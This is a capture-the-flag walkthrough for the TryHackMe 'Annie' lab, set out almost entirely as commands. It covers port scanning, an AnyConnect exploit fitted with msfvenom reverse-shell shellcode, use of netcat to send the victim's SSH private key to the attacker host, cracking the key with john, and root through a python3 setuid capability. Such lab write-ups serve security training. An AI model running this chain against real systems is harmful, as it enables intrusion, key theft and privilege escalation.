Annie

Room Link: https://tryhackme.com/room/annie

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/7070 - AnyConnect

Exploit: https://www.exploit-db.com/raw/49613

Took for the code above and just had to change the shellcode and ip variable.

Kali

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Kali

nc -lvnp 4444

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cat /home/annie/.ssh/id_rsa
nc -w 3 $KALI 1234 < /home/annie/.ssh/id_rsa

Kali

nc -l -p 1234 > id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt

Kali

ssh -i id_rsa annie@$VICTIM

Privilege Escalation

Victim

find / -perm -u=s -type f 2> /dev/null

Victim

cp /usr/bin/python3 /home/annie/python3
setcap cap_setuid+ep /home/annie/python3
ls -al /home/annie/python3
/home/annie/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

PreviousHaskHell NextContainMe

Last updated 1 year ago